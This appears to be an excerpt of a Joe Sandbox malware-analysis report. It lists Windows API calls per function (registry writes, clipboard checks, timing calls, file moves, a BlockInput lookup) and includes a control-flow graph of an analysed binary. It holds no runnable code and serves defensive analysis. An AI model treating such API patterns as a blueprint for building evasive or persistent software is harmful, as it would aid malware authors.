      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00413770: _strncpy.LIBCMT ref: 00413989
      • Part of subcall function 00413770: RegConnectRegistryA.ADVAPI32(?), ref: 004139AB
      • Part of subcall function 0046E900: RegCreateKeyExA.ADVAPI32(00000000,?,00000000,004987E9,00000000,?,00000000,?,?,00000000,004987E9,?,00000000,?,001B2FD0), ref: 0046E951
      • Part of subcall function 0046E900: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,004987E9,004987EB,?,00000000,?,001B2FD0), ref: 0046E99A
      • Part of subcall function 0046E900: RegSetValueExA.ADVAPI32(?,?,00000000,00000002,004987E9,004987EB,?,00000000,?,001B2FD0), ref: 0046E9CA
      • Part of subcall function 0046E900: _strncpy.LIBCMT ref: 0046EA06
      • Part of subcall function 0046E900: RegSetValueExA.ADVAPI32(?,?,00000000,00000007,00000000,00000000,?,?,?,00000004,?,00000000,?,001B2FD0), ref: 0046EA59
      • Part of subcall function 0046E900: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,00000000,?,00000000,?,001B2FD0), ref: 0046EB56
      • Part of subcall function 0046E900: RegCloseKey.ADVAPI32(?,?,?,00000000,?,001B2FD0), ref: 0046EB77
      • Part of subcall function 0046E900: RegCloseKey.ADVAPI32(?,?,00000000,?,001B2FD0), ref: 0046EBB3
      • Part of subcall function 0046E900: GetLastError.KERNEL32(?,00000000,?,001B2FD0), ref: 0046EBBE
    • RegCloseKey.ADVAPI32(00000000), ref: 004280B6
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00413770: _strncpy.LIBCMT ref: 00413989
      • Part of subcall function 00413770: RegConnectRegistryA.ADVAPI32(?), ref: 004139AB
      • Part of subcall function 0046E550: RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 0046E5BD
      • Part of subcall function 0046E550: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00000000,?,?,00000000,?,?), ref: 0046E5E0
      • Part of subcall function 0046E550: RegCloseKey.ADVAPI32(?,?,?,00000000,?,?), ref: 0046E638
      • Part of subcall function 0046E550: GetLastError.KERNEL32(?,?,00000000,?,?), ref: 0046E647
      • Part of subcall function 0046E550: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,?,?), ref: 0046E667
      • Part of subcall function 0046E550: RegCloseKey.ADVAPI32(?,00000000,00000001,?,?,00000000,?,?), ref: 0046E68F
      • Part of subcall function 0046E550: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,004ABB26,?,00000000,00000001,?,?,00000000,?,?), ref: 0046E6F4
      • Part of subcall function 0046E550: RegCloseKey.ADVAPI32(?,?,?,00000000,?,?), ref: 0046E6FD
      • Part of subcall function 0046E550: RegCloseKey.ADVAPI32(?,00000000,00000001,?,?,?,?), ref: 0046E7B5
      • Part of subcall function 0046E550: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0046E831
      • Part of subcall function 0046E550: RegCloseKey.ADVAPI32(?,?,?,00000000,?,?), ref: 0046E8D1
    • RegCloseKey.ADVAPI32(00000000), ref: 00427FFA
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 8748 48aea1-48aec5 GetStartupInfoW call 48ac43 8751 48aecf-48aee2 8748->8751 8752 48aec7-48aeca 8748->8752 8754 48aee4 8751->8754 8755 48af1a-48af20 8751->8755 8753 48b0de-48b0e0 8752->8753 8756 48aee7-48af18 8754->8756 8757 48af26-48af2b 8755->8757 8758 48b034 8755->8758 8756->8755 8756->8756 8757->8758 8760 48af31-48af45 8757->8760 8759 48b036-48b046 8758->8759 8761 48b048-48b04b 8759->8761 8762 48b053-48b059 8759->8762 8763 48af47 8760->8763 8764 48af49-48af4f 8760->8764 8761->8762 8767 48b04d-48b051 8761->8767 8765 48b05b-48b05e 8762->8765 8766 48b060-48b067 8762->8766 8763->8764 8768 48af51 8764->8768 8769 48afbc-48afc0 8764->8769 8770 48b06a-48b076 GetStdHandle 8765->8770 8766->8770 8772 48b0c4-48b0c8 8767->8772 8773 48af56-48af63 call 48ac43 8768->8773 8769->8758 8771 48afc2-48afca 8769->8771 8775 48b078-48b07a 8770->8775 8776 48b0ba-48b0be 8770->8776 8778 48afcc-48afcf 8771->8778 8779 48b028-48b032 8771->8779 8772->8759 8774 48b0ce-48b0da SetHandleCount 8772->8774 8784 48af65-48af76 8773->8784 8785 48afb6 8773->8785 8780 48b0dc-48b0dd 8774->8780 8775->8776 8782 48b07c-48b085 GetFileType 8775->8782 8776->8772 8778->8779 8783 48afd1-48afd9 8778->8783 8779->8758 8779->8771 8780->8753 8782->8776 8786 48b087-48b091 8782->8786 8783->8779 8787 48afdb-48afde 8783->8787 8788 48afa9-48afb2 8784->8788 8789 48af78 8784->8789 8785->8769 8790 48b093-48b097 8786->8790 8791 48b099-48b09c 8786->8791 8792 48afeb-48b01f InitializeCriticalSectionAndSpinCount 8787->8792 8793 48afe0-48afe9 GetFileType 8787->8793 8788->8773 8794 48afb4 8788->8794 8795 48af7b-48afa7 8789->8795 8796 48b0a2-48b0b3 InitializeCriticalSectionAndSpinCount 8790->8796 8791->8796 8799 48b09e 8791->8799 8797 48b0e1-48b0e4 8792->8797 8798 48b025 8792->8798 8793->8779 8793->8792 8794->8769 8795->8788 8795->8795 8796->8797 8800 48b0b5-48b0b8 8796->8800 8797->8780 8798->8779 8799->8796 8800->8772
    APIs
    • GetStartupInfoW.KERNEL32(?), ref: 0048AEAE
      • Part of subcall function 0048AC43: Sleep.KERNEL32(00000000,004719BE,004011C4), ref: 0048AC6B
    • GetFileType.KERNEL32(?), ref: 0048AFE1
    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0048B017
    • GetStdHandle.KERNEL32(-000000F6), ref: 0048B06B
    • GetFileType.KERNEL32(00000000), ref: 0048B07D
    • InitializeCriticalSectionAndSpinCount.KERNEL32(-004AD594,00000FA0), ref: 0048B0AB
    • SetHandleCount.KERNEL32 ref: 0048B0D4
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    • MoveFileA.KERNEL32(004987E9,004987E9), ref: 004270B9
      • Part of subcall function 00451B70: GetFullPathNameA.KERNEL32(004987E9,00000104,?,?), ref: 00451B8D
      • Part of subcall function 00451B70: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451BC8
      • Part of subcall function 00451B70: GetFileAttributesA.KERNEL32(?), ref: 00451BFD
      • Part of subcall function 00451B70: GetFileAttributesA.KERNEL32(?), ref: 00451C10
      • Part of subcall function 00451B70: SHFileOperation.SHELL32(00000000), ref: 00451D07
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    • OutputDebugStringA.KERNEL32(004987E9), ref: 0042830B
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 0042CF30: GetMenu.USER32(000601DA), ref: 0042CF71
      • Part of subcall function 0042CF30: CheckMenuItem.USER32(00000000,?,00000000), ref: 0042CF78
      • Part of subcall function 0042D080: GetModuleHandleA.KERNEL32(user32,BlockInput,00427E02,004987E9), ref: 0042D09A
      • Part of subcall function 0042D080: GetProcAddress.KERNEL32(00000000), ref: 0042D0A1
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
